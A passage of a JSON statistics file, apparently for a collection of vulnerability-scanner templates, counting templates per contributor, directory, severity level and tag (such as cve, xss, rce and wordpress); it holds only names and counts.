@yashanand155","count":3},{"name":"atomiczsec","count":3},{"name":"skeltavik","count":3},{"name":"shifacyclewala","count":3},{"name":"evergreencartoons","count":3},{"name":"binaryfigments","count":3},{"name":"dr0pd34d","count":3},{"name":"whoever","count":3},{"name":"parth","count":3},{"name":"lucasljm2001","count":3},{"name":"farish","count":3},{"name":"impramodsargar","count":3},{"name":"me9187","count":3},{"name":"flx","count":3},{"name":"mavericknerd","count":3},{"name":"f1tz","count":3},{"name":"jarijaas","count":3},{"name":"fxploit","count":3},{"name":"badboycxcc","count":3},{"name":"imjust0","count":3},{"name":"splint3r7","count":3},{"name":"_generic_human_","count":3},{"name":"ekrause","count":3},{"name":"randomrobbie","count":3},{"name":"swissky","count":3},{"name":"isacaya","count":3},{"name":"ph33r","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"thomas_from_offensity","count":3},{"name":"huowuzhao","count":3},{"name":"davidmckennirey","count":3},{"name":"andydoering","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"canberbamber","count":3},{"name":"arcc","count":3},{"name":"j3ssie","count":3},{"name":"aringo","count":3},{"name":"alifathi-h1","count":3},{"name":"e1a","count":3},{"name":"xianke","count":3},{"name":"unstabl3","count":3},{"name":"ambassify","count":3},{"name":"salts","count":3},{"name":"fyoorer","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"sushantkamble","count":3},{"name":"true13","count":3},{"name":"matt galligan","count":3},{"name":"dbrwsky","count":2},{"name":"koti2","count":2},{"name":"nuk3s3c","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"0xelkomy","count":2},{"name":"g4l1t0","count":2},{"name":"nkxxkn","count":2},{"name":"paradessia","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"brucelsone","count":2},{"name":"raesene","count":2},{"name":"mohammedsaneem","count":2},{"name":"zomsop82","count":2},{"name":"uomogrande","count":2},{"name":"codexlynx","count":2},{"name":"joeldeleep","count":2},{"name":"danielmofer","count":2},{"name":"herry","count":2},{"name":"bmcel","count":2},{"name":"0xcrypto","count":2},{"name":"v0idc0de","count":2},{"name":"randomdhiraj","count":2},{"name":"joshlarsen","count":2},{"name":"ree4pwn","count":2},{"name":"davidegirardi","count":2},{"name":"paperpen","count":2},{"name":"kiblyn11","count":2},{"name":"kishore-hariram","count":2},{"name":"n-thumann","count":2},{"name":"vavkamil","count":2},{"name":"h0j3n","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"notnotnotveg","count":2},{"name":"supras","count":2},{"name":"moritz nentwig","count":2},{"name":"bananabr","count":2},{"name":"liwermor","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"luci","count":2},{"name":"geekby","count":2},{"name":"0xsapra","count":2},{"name":"socketz","count":2},{"name":"zy9ard3","count":2},{"name":"christianpoeschl","count":2},{"name":"supr4s","count":2},{"name":"mzack9999","count":2},{"name":"udit_thakkur","count":2},{"name":"mrharshvardhan","count":2},{"name":"amsda","count":2},{"name":"d4vy","count":2},{"name":"kre80r","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"thezakman","count":2},{"name":"dogancanbakir","count":2},{"name":"shankaracharya","count":2},{"name":"arliya","count":2},{"name":"dahse89","count":2},{"name":"clarkvoss","count":2},{"name":"666asd","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"redteambrasil","count":2},{"name":"ehsahil","count":2},{"name":"gal nagli","count":2},{"name":"hackerarpan","count":2},{"name":"cckuakilong","count":2},{"name":"danmcinerney","count":2},{"name":"pxmme1337","count":2},{"name":"8arthur","count":2},{"name":"bp0lr","count":2},{"name":"y4er","count":2},{"name":"charles d.","count":2},{"name":"pbuff07","count":2},{"name":"z0ne","count":2},{"name":"github.com/its0x08","count":2},{"name":"afaq","count":2},{"name":"6mile","count":2},{"name":"bing0o","count":2},{"name":"cocxanh","count":2},{"name":"joshua rogers","count":2},{"name":"hetroublemakr","count":2},{"name":"wa1tf0rme","count":2},{"name":"streetofhackerr007","count":2},{"name":"usdag","count":2},{"name":"florianmaak","count":2},{"name":"nvn1729","count":2},{"name":"c4sper0","count":2},{"name":"ep1csage","count":2},{"name":"maximus decimus","count":2},{"name":"x1m_martijn","count":2},{"name":"ajaysenr","count":2},{"name":"myztique","count":2},{"name":"martincodes-de","count":2},{"name":"convisoappsec","count":2},{"name":"rafaelwdornelas","count":2},{"name":"thevillagehacker","count":2},{"name":"thardt-praetorian","count":2},{"name":"shelled","count":2},{"name":"msegoviag","count":2},{"name":"korteke","count":2},{"name":"manas_harsh","count":2},{"name":"sascha brendel","count":2},{"name":"c3l3si4n","count":2},{"name":"sinkettu","count":2},{"name":"w4cky_","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"k11h-de","count":2},{"name":"ayadim","count":2},{"name":"thabisocn","count":2},{"name":"parzival","count":2},{"name":"brenocss","count":2},{"name":"sbani","count":2},{"name":"foulenzer","count":2},{"name":"0xsmiley","count":2},{"name":"pussycat0","count":1},{"name":"juliosmelo","count":1},{"name":"rotembar","count":1},{"name":"carson chan","count":1},{"name":"elder tao","count":1},{"name":"fq_hsu","count":1},{"name":"miryangjung","count":1},{"name":"osamahamad","count":1},{"name":"dale clarke","count":1},{"name":"w8ay","count":1},{"name":"exid","count":1},{"name":"luciannitescu","count":1},{"name":"regala_","count":1},{"name":"daffianfo","count":1},{"name":"_darrenmartyn","count":1},{"name":"hexcat","count":1},{"name":"marcio mendes","count":1},{"name":"jna1","count":1},{"name":"colbyjack1134","count":1},{"name":"dabla","count":1},{"name":"mbmy","count":1},{"name":"mihhailsokolov","count":1},{"name":"sanineng","count":1},{"name":"apt-mirror","count":1},{"name":"igibanez","count":1},{"name":"lrtk-coder","count":1},{"name":"0xceba","count":1},{"name":"knassar702","count":1},{"name":"mayankpandey01","count":1},{"name":"th3r4id","count":1},{"name":"harshinsecurity","count":1},{"name":"hakluke","count":1},{"name":"hotpot","count":1},{"name":"ling","count":1},{"name":"phillipo","count":1},{"name":"duty_1g","count":1},{"name":"rinolock","count":1},{"name":"bughuntersurya","count":1},{"name":"sdcampbell","count":1},{"name":"cravaterouge","count":1},{"name":"alexrydzak","count":1},{"name":"2rs3c","count":1},{"name":"arr0way","count":1},{"name":"numan türle","count":1},{"name":"banana69","count":1},{"name":"myst7ic","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"p-l-","count":1},{"name":"jeya seelan","count":1},{"name":"axrk","count":1},{"name":"mantissts","count":1},{"name":"lamscun","count":1},{"name":"brianlam38","count":1},{"name":"f1she3","count":1},{"name":"michael wedl","count":1},{"name":"petruknisme","count":1},{"name":"absshax","count":1},{"name":"yusakie","count":1},{"name":"sttlr","count":1},{"name":"gonski","count":1},{"name":"queencitycyber","count":1},{"name":"elitebaz","count":1},{"name":"fur1na","count":1},{"name":"danfaizer","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"kresec","count":1},{"name":"zandros0","count":1},{"name":"akash.c","count":1},{"name":"abbas.heybati","count":1},{"name":"hardik-rathod","count":1},{"name":"prettyboyaaditya","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"j33n1k4","count":1},{"name":"husain","count":1},{"name":"vzamanillo","count":1},{"name":"aresx","count":1},{"name":"cbadke","count":1},{"name":"r3s ost","count":1},{"name":"s1r1us","count":1},{"name":"akokonunes","count":1},{"name":"houdinis","count":1},{"name":"pry0cc","count":1},{"name":"willd96","count":1},{"name":"rodnt","count":1},{"name":"esonhugh","count":1},{"name":"pascalheidmann","count":1},{"name":"ok_bye_now","count":1},{"name":"chron0x","count":1},{"name":"hakimkt","count":1},{"name":"wabafet","count":1},{"name":"udinchan","count":1},{"name":"kailashbohara","count":1},{"name":"mordavid","count":1},{"name":"arall","count":1},{"name":"0xtavian","count":1},{"name":"millermedia","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"luqmaan hadia","count":1},{"name":"thebinitghimire","count":1},{"name":"marcos_iaf","count":1},{"name":"soyelmago","count":1},{"name":"ringo","count":1},{"name":"nagli","count":1},{"name":"mass0ma","count":1},{"name":"erethon","count":1},{"name":"eremit4","count":1},{"name":"iphantasmic","count":1},{"name":"phyr3wall","count":1},{"name":"dmartyn","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"xeldax","count":1},{"name":"josecosta","count":1},{"name":"tirtha_mandal","count":1},{"name":"m0ck3d","count":1},{"name":"danigoland","count":1},{"name":"rumble773","count":1},{"name":"jcockhren","count":1},{"name":"whynotke","count":1},{"name":"qianbenhyu","count":1},{"name":"tea","count":1},{"name":"ooooooo_q","count":1},{"name":"gboddin","count":1},{"name":"hateshape","count":1},{"name":"drfabiocastro","count":1},{"name":"irshadahamed","count":1},{"name":"aaban solutions","count":1},{"name":"imhunterand","count":1},{"name":"vinit989","count":1},{"name":"luskabol","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"httpvoid","count":1},{"name":"orpheus","count":1},{"name":"r3nz0","count":1},{"name":"deena","count":1},{"name":"geraldino2","count":1},{"name":"sshell","count":1},{"name":"kabirsuda","count":1},{"name":"borna nematzadeh","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"jrolf","count":1},{"name":"youngpope","count":1},{"name":"af001","count":1},{"name":"notwhy","count":1},{"name":"alperenkesk","count":1},{"name":"mhdsamx","count":1},{"name":"zn9988","count":1},{"name":"momen eldawakhly","count":1},{"name":"dwbzn","count":1},{"name":"tehtbl","count":1},{"name":"null_hypothesis","count":1},{"name":"pratik khalane","count":1},{"name":"galoget","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"liquidsec","count":1},{"name":"0xrod","count":1},{"name":"notsoevilweasel","count":1},{"name":"manasmbellani","count":1},{"name":"h4sh5","count":1},{"name":"adrianmf","count":1},{"name":"matt miller","count":1},{"name":"yavolo","count":1},{"name":"revblock","count":1},{"name":"palanichamy_perumal","count":1},{"name":"jaskaran","count":1},{"name":"lark lab","count":1},{"name":"olewagner","count":1},{"name":"makyotox","count":1},{"name":"fpatrik","count":1},{"name":"ahmed abou-ela","count":1},{"name":"bywalks","count":1},{"name":"h4kux","count":1},{"name":"sak1","count":1},{"name":"metascan","count":1},{"name":"retr02332","count":1},{"name":"evolutionsec","count":1},{"name":"droberson","count":1},{"name":"davidfegyver","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"d0rkerdevil","count":1},{"name":"miguelsegoviagil","count":1},{"name":"hyunsoo-ds","count":1},{"name":"barthy.koeln","count":1},{"name":"xc1ym","count":1},{"name":"mariam tariq","count":1},{"name":"xshuden","count":1},{"name":"skylark-lab","count":1},{"name":"exceed","count":1},{"name":"jiheon-dev","count":1},{"name":"mayank_pandey01","count":1},{"name":"christbowel","count":1},{"name":"d4ly","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"puben","count":1},{"name":"joaonevess","count":1},{"name":"michal-mikolas","count":1},{"name":"noamrathaus","count":1},{"name":"pphuahua","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lingtren","count":1},{"name":"yiran","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yashanand155","count":1},{"name":"rojanrijal","count":1},{"name":"ofjaaah","count":1},{"name":"nielsing","count":1},{"name":"amnotacat","count":1},{"name":"dorkerdevil","count":1},{"name":"rschio","count":1},{"name":"evan rubinstien","count":1},{"name":"therealtoastycat","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"jub0bs","count":1},{"name":"pudsec","count":1},{"name":"egemenkochisarli","count":1},{"name":"elmahdi","count":1},{"name":"zinminphy0","count":1},{"name":"freakyclown","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"ohlinge","count":1},{"name":"couskito","count":1},{"name":"sicksec","count":1},{"name":"fopina","count":1},{"name":"ndmalc","count":1},{"name":"mabdullah22","count":1},{"name":"tirtha","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"kiks7","count":1},{"name":"act1on3","count":1},{"name":"berkdusunur","count":1},{"name":"remonsec","count":1},{"name":"godfatherorwa","count":1},{"name":"undefl0w","count":1},{"name":"un-fmunozs","count":1},{"name":"none","count":1},{"name":"high","count":1},{"name":"pdp","count":1},{"name":"opencirt","count":1},{"name":"technicaljunkie","count":1},{"name":"infosecsanyam","count":1},{"name":"ap3r","count":1},{"name":"viondexd","count":1},{"name":"ptonewreckin","count":1},{"name":"amirmsafari","count":1},{"name":"nuts7","count":1},{"name":"win3zz","count":1},{"name":"caon","count":1},{"name":"justmumu","count":1},{"name":"patrick pirker","count":1},{"name":"b0yd","count":1},{"name":"micha3lb3n","count":1},{"name":"carrot2","count":1},{"name":"compr00t","count":1},{"name":"vikas kundu","count":1},{"name":"shivampand3y","count":1},{"name":"0xcharan","count":1},{"name":"k3rwin","count":1},{"name":"dk999","count":1},{"name":"omarkurt","count":1},{"name":"noobexploiter","count":1},{"name":"shivanshkhari","count":1},{"name":"amir-h-fallahi","count":1},{"name":"affix","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"dievus","count":1},{"name":"mlec","count":1},{"name":"open-sec","count":1},{"name":"allenwest24","count":1},{"name":"vulnspace","count":1},{"name":"wpsec","count":1},{"name":"ramkrishna sawant","count":1},{"name":"mesaglio","count":1},{"name":"mr.bobo hp","count":1},{"name":"xcapri","count":1},{"name":"mah3sec_","count":1},{"name":"dali","count":1},{"name":"kurohost","count":1},{"name":"hazana","count":1},{"name":"jbertman","count":1},{"name":"ramondunker","count":1},{"name":"bjxsec","count":1},{"name":"topscoder","count":1},{"name":"jteles","count":1},{"name":"kareemse1im","count":1},{"name":"aaronchen0","count":1},{"name":"byobin","count":1},{"name":"ola456","count":1},{"name":"realexp3rt","count":1},{"name":"sinsinology","count":1},{"name":"pepitoh","count":1},{"name":"iampritam","count":1},{"name":"pjborah","count":1},{"name":"shockwave","count":1},{"name":"calumjelrick","count":1},{"name":"mukundbhuva","count":1},{"name":"jc175","count":1},{"name":"yuansec","count":1},{"name":"kaizensecurity","count":1},{"name":"bugvsme","count":1},{"name":"jacalynli","count":1},{"name":"mchklt","count":1},{"name":"kiransau","count":1},{"name":"co0nan","count":1},{"name":"y0no","count":1},{"name":"tangxiaofeng7","count":1},{"name":"majidmc2","count":1},{"name":"aringo-bf","count":1},{"name":"ahmetpergamum","count":1},{"name":"arqsz","count":1},{"name":"francescocarlucci","count":1},{"name":"zsusac","count":1},{"name":"savik","count":1},{"name":"ahmed sherif","count":1},{"name":"bjhulst","count":1},{"name":"lethargynavigator","count":1},{"name":"am0nt31r0","count":1},{"name":"0xkayala","count":1},{"name":"harryha","count":1},{"name":"b4uh0lz","count":1},{"name":"kchason","count":1},{"name":"0xceeb","count":1},{"name":"shelld3v","count":1},{"name":"bad5ect0r","count":1},{"name":"unblvr1","count":1},{"name":"exploitation","count":1},{"name":"pwnwithlove","count":1},{"name":"ransomsec","count":1},{"name":"0xteles","count":1},{"name":"shifacyclewla","count":1},{"name":"yashgoti","count":1},{"name":"nobody","count":1},{"name":"aayush vishnoi","count":1},{"name":"juicypotato1","count":1},{"name":"aron molnar","count":1},{"name":"lixts","count":1},{"name":"th3.d1p4k","count":1},{"name":"zhenwarx","count":1},{"name":"ilovebinbash","count":1},{"name":"adamparsons","count":1},{"name":"sospiro","count":1},{"name":"ledoubletake","count":1},{"name":"piyushchhiroliya","count":1},{"name":"smaranchand","count":1},{"name":"f0xy","count":1},{"name":"rotemreiss","count":1},{"name":"mammad_rahimzada","count":1},{"name":"w0tx","count":1},{"name":"watchtowr","count":1},{"name":"blckraven","count":1},{"name":"hanlaomo","count":1},{"name":"furkansenan","count":1},{"name":"ph33rr","count":1},{"name":"bartu utku sarp","count":1},{"name":"floriandewald","count":1},{"name":"domenicoveneziano","count":1},{"name":"yaser_s","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"thirukrishnan","count":1},{"name":"professorabhay","count":1},{"name":"andysvints","count":1},{"name":"noah @thesubtlety","count":1},{"name":"aravind","count":1},{"name":"0xprial","count":1},{"name":"unp4ck","count":1},{"name":"1nf1n7y","count":1},{"name":"push4d","count":1},{"name":"toufik-airane","count":1},{"name":"philippdelteil","count":1},{"name":"b0rn2r00t","count":1},{"name":"xstp","count":1},{"name":"official_blackhat13","count":1},{"name":"intx0x80","count":1},{"name":"adnanekhan","count":1},{"name":"natto97","count":1},{"name":"jas37","count":1},{"name":"paper-pen","count":1},{"name":"sec_hawk","count":1},{"name":"oscarintherocks","count":1},{"name":"furkansayim","count":1},{"name":"izn0u","count":1},{"name":"petergrifin","count":1},{"name":"rivalsec","count":1},{"name":"ky9oss","count":1},{"name":"ayadi","count":1},{"name":"chesterblue","count":1},{"name":"alex","count":1},{"name":"becivells","count":1},{"name":"patralos","count":1},{"name":"ynnirc","count":1},{"name":"0xd0ff9","count":1},{"name":"lbb","count":1},{"name":"sorrowx3","count":1},{"name":"lstatro","count":1},{"name":"hlop","count":1},{"name":"akshansh","count":1},{"name":"s1r1u5_","count":1},{"name":"mubassirpatel","count":1},{"name":"carlosvieira","count":1},{"name":"luqman","count":1},{"name":"0xh7ml","count":1},{"name":"charanrayudu","count":1},{"name":"t3l3machus","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kagamigawa","count":1},{"name":"booboohq","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"schniggie","count":1},{"name":"chetgan","count":1},{"name":"shreyapohekar","count":1},{"name":"spac3wh1te","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"djoevanka","count":1},{"name":"erikowen","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"unkl4b","count":1},{"name":"elouhi","count":1},{"name":"secthebit","count":1},{"name":"unknown","count":1},{"name":"rubina119","count":1},{"name":"west-wise","count":1},{"name":"naglis","count":1},{"name":"_harleo","count":1},{"name":"zeyad azima","count":1},{"name":"jaimin gondaliya","count":1},{"name":"0xparth","count":1},{"name":"failopen","count":1},{"name":"amanrawat","count":1},{"name":"8authur","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"gpiechnik2","count":1},{"name":"screamy","count":1},{"name":"kr1shna4garwal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"nerrorsec","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sherlocksecurity","count":1},{"name":"whotwagner","count":1},{"name":"tim_koopmans","count":1},{"name":"flag007","count":1},{"name":"arjunchandarana","count":1},{"name":"wlayzz","count":1},{"name":"0h1in9e","count":1},{"name":"viniciuspereiras","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"hczdmr","count":1},{"name":"lady_bug","count":1},{"name":"jonathanwalker","count":1},{"name":"brabbit10","count":1},{"name":"adilsoybali","count":1},{"name":"jbaines-r7","count":1},{"name":"invisiblethreat","count":1},{"name":"anon-artist","count":1},{"name":"archer","count":1},{"name":"ldionmarcil","count":1},{"name":"clment cruchet","count":1},{"name":"shiar","count":1},{"name":"higor melgaço","count":1},{"name":"manuelbua","count":1},{"name":"ruppde","count":1},{"name":"babybash","count":1},{"name":"denandz","count":1},{"name":"stupidfish","count":1},{"name":"shiva (strobes security)","count":1},{"name":"nytr0gen","count":1},{"name":"miroslavsotak","count":1},{"name":"fmunozs","count":1},{"name":"omarjezi","count":1},{"name":"jeya.seelan","count":1},{"name":"alevsk","count":1},{"name":"thelicato","count":1},{"name":"narluin","count":1},{"name":"5up3r541y4n","count":1},{"name":"jfbes","count":1},{"name":"udyz","count":1},{"name":"guax1","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"sickwell","count":1},{"name":"retr0","count":1},{"name":"breno_css","count":1}],"directory":[{"name":"http","count":7355},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":136},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":56},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3645},{"name":"high","count":1686},{"name":"medium","count":1503},{"name":"critical","count":1009},{"name":"low","count":265},{"name":"unknown","count":38}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2474},{"name":"panel","count":1133},{"name":"wordpress","count":973},{"name":"exposure","count":908},{"name":"xss","count":904},{"name":"wp-plugin","count":844},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":654},{"name":"misconfig","count":606},{"name":"edb","count":599},{"name":"rce","count":591},{"name":"packetstorm","count":530},{"name":"wpscan","count":495},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":419},{"name":"cve2023","count":364},{"name":"unauth","count":363},{"name":"sqli","count":352},{"name":"file","count":346},{"name":"authenticated","count":342},{"name":"intrusive","count":299},{"name":"kev","count":268},{"name":"detect","count":259},{"name":"login","count":259},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":221},{"name":"config","count":220},{"name":"top-200","count":215},{"name":"default-login","count":211},{"name":"osint-social","count":210},{"name":"network","count":194},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":129},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cms","count":110},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"install","count":107},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"cve2024","count":63},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"php","count":44},{"name":"jndi","count":44},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"springboot","count":41},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"tls","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":29},{"name":"dlink","count":29},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"ssh","count":28},{"name":"k8s","count":28},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":27},{"name":"citrix","count":27},{"name":"cve2012","count":26},{"name":"proxy","count":26},{"name":"firewall","count":25},{"name":"lfr","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"weaver","count":25},{"name":"dns","count":24},{"name":"zoho","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"file-upload","count":23},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"s3","count":22},{"name":"dast","count":21},{"name":"printer","count":21},{"name":"github","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"grafana","count":19},{"name":"ftp","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"mail","count":17},{"name":"service","count":17},{"name":"nginx","count":17},{"name":"azure","count":17},{"name":"node.js","count":17},{"name":"confluence","count":17},{"name":"vpn","count":16},{"name":"magento","count":16},{"name":"backup","count":16},{"name":"status","count":16},{"name":"honeypot","count":16},{"name":"jarm","count":16},{"name":"alibaba","count":16},{"name":"osint-blog","count":16},{"name":"microweber","count":16},{"name":"cve2009","count":16},{"name":"rconfig","count":16},{"name":"dashboard","count":15},{"name":"cve2008","count":15},{"name":"zyxel","count":15},{"name":"cve2013","count":15},{"name":"seeyon","count":15},{"name":"bypass","count":15},{"name":"java","count":15},{"name":"ruby","count":15},{"name":"backdoor","count":15},{"name":"woocommerce","count":15},{"name":"nodejs","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"node","count":14},{"name":"npm","count":14},{"name":"rds","count":14},{"name":"auth","count":14},{"name":"setup","count":14},{"name":"osint-art","count":14},{"name":"windows","count":14},{"name":"smb","count":14},{"name":"dell","count":14},{"name":"domainmod","count":14},{"name":"login-check","count":14},{"name":"nagios","count":14},{"name":"redhat","count":14},{"name":"smtp","count":14},{"name":"redis","count":14},{"name":"osint-health","count":14},{"name":"docker","count":14},{"name":"ssti","count":14},{"name":"creds-stuffing","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"moosocial","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"fortigate","count":13},{"name":"ivanti","count":13},{"name":"rails","count":13},{"name":"hashicorp","count":13},{"name":"graphql","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"airflow","count":13},{"name":"netgear","count":13},{"name":"cuppacms","count":13},{"name":"osint-dating","count":13},{"name":"sonicwall","count":13},{"name":"cuppa","count":13},{"name":"drupal","count":12},{"name":"kafka","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"netsweeper","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"django","count":11},{"name":"fastjson","count":11},{"name":"iam","count":11},{"name":"online-fire-reporting","count":11},{"name":"hikvision","count":11},{"name":"installer","count":11},{"name":"info-leak","count":11},{"name":"cache","count":11},{"name":"xstream","count":11},{"name":"phpgurukul","count":11},{"name":"osint-video","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"spring","count":11},{"name":"prometheus","count":11},{"name":"elasticsearch","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"glpi","count":10},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"dedecms","count":10},{"name":"zabbix","count":10},{"name":"xstream_project","count":10},{"name":"druid","count":9},{"name":"lucee","count":9},{"name":"gitea","count":9},{"name":"dahua","count":9},{"name":"moodle","count":9},{"name":"wso2","count":9},{"name":"pfsense","count":9},{"name":"cnvd2020","count":9},{"name":"secret","count":9},{"name":"firebase","count":9},{"name":"exchange","count":9},{"name":"elastic","count":9},{"name":"facebook","count":9},{"name":"crlf","count":9},{"name":"cloudtrail","count":9},{"name":"python","count":9},{"name":"vcenter","count":9},{"name":"sangfor","count":9},{"name":"bitbucket","count":9},{"name":"progress","count":9},{"name":"artica","count":9},{"name":"opencats","count":9},{"name":"scada","count":9},{"name":"blind","count":9},{"name":"kube","count":9},{"name":"sophos","count":9},{"name":"versa","count":9},{"name":"ognl","count":8},{"name":"huawei","count":8},{"name":"mlflow","count":8},{"name":"manager","count":8},{"name":"config-audit","count":8},{"name":"wanhu","count":8},{"name":"emerge","count":8},{"name":"osint-news","count":8},{"name":"spotweb_project","count":8},{"name":"hms","count":8},{"name":"error","count":8},{"name":"odoo","count":8},{"name":"cloud-enum","count":8},{"name":"recon","count":8},{"name":"go","count":8},{"name":"oauth","count":8},{"name":"console","count":8},{"name":"atom","count":8},{"name":"cisco-switch","count":8},{"name":"metadata","count":8},{"name":"symantec","count":8},{"name":"phpjabbers","count":8},{"name":"spotweb","count":8},{"name":"bucket","count":8},{"name":"gateway","count":8},{"name":"phpinfo","count":8},{"name":"default-page","count":8},{"name":"unauthenticated","count":8},{"name":"mirai","count":8},{"name":"e-office","count":8},{"name":"discord","count":8},{"name":"exploitdb","count":7},{"name":"keking","count":7},{"name":"nacos","count":7},{"name":"nortekcontrol","count":7},{"name":"landray","count":7},{"name":"shopify","count":7},{"name":"nexus","count":7},{"name":"openemr","count":7},{"name":"teamcity","count":7},{"name":"bloofox","count":7},{"name":"database","count":7},{"name":"maps","count":7},{"name":"instrusive","count":7